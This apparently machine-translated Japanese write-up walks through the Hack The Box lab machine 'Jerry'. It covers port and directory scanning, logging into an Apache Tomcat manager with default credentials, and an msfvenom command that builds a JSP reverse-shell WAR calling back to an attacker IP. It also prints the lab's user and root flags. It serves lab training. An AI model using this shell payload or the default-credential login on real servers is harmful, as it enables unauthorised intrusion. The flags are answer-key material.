banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

htb靶场 - ジェリー

ジェリー#

ジェリーは Hack The Box の中で比較的簡単なマシンの一つですが、Apache Tomcat はしばしば露出しており、一般的または弱い資格情報で構成されているため、現実的です。

ip アドレス:10.10.10.95

task1 リモートホストはどのポートを開放していますか?

nmap を使用してスキャンし、ポートの開放状況を確認します。

nmap -sV 10.10.10.95

da4c3b5c921fd9a70671aa0b1b00f1db_MD5

task2 リモートホストはどのサービスを実行していますか?

nmap のスキャン結果から、Apache Tomcat であることがわかります。

task3 Web サーバー上のどの相対パスが Web アプリケーションマネージャに通じていますか?

5478701084fbb552cbabd751812c92df_MD5

dirsearch -u http://10.10.10.95:8080/

テストの結果、/manager/htmlであることがわかり、ディレクトリスキャンで確認できます。

task4 どの有効なユーザー名とパスワードの組み合わせが Tomcat Web アプリケーションマネージャへの認証に使用できますか? usernameの形式で答えてください。

admin/admin でログイン後

d3c8f4025796da09d722d91f845607d9_MD5

tomcat

39b52d9b28c7ba54ef37f2fced070be7_MD5

task5 どのタイプのファイルがサーバーにデプロイできますか?

もちろん、war パッケージです。

task ユーザーのフラグを提出

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=3155 -f war > shell.war

5b8913f60909dda3532be9476d04c2f5_MD5

2f30b2facbf7dbad8655979755197b52_MD5

95d56514dd6a0987200fea815c4a05dd_MD5

http://10.10.10.95:8080/shell/ をクリックします。

シェルがリバウンドします。

b95a9f57e33b090d532c7968b6ce9bff_MD5

ce04826dbd941201445f1dd44d6a09c1_MD5

このようなファイルはどうやって読み取りますか?

type *.txt

2a22782298cb0a82d00329420159c7e3_MD5

2 つのフラグがあります。

ユーザーフラグ:7004dbcef0f854e0fb401875f26ebd00

task root のフラグを提出

04a8b36e1545a455393d067e772fe90e


http://10.10.10.95:8080/manager/status

ajp の任意ファイル読み取りがあると思ったのですが。

ea0715aea55735617cc9f44aaac072f2_MD5

216733999b175aa05288747da68eb80c_MD5

読み込み中...
文章は、創作者によって署名され、ブロックチェーンに安全に保存されています。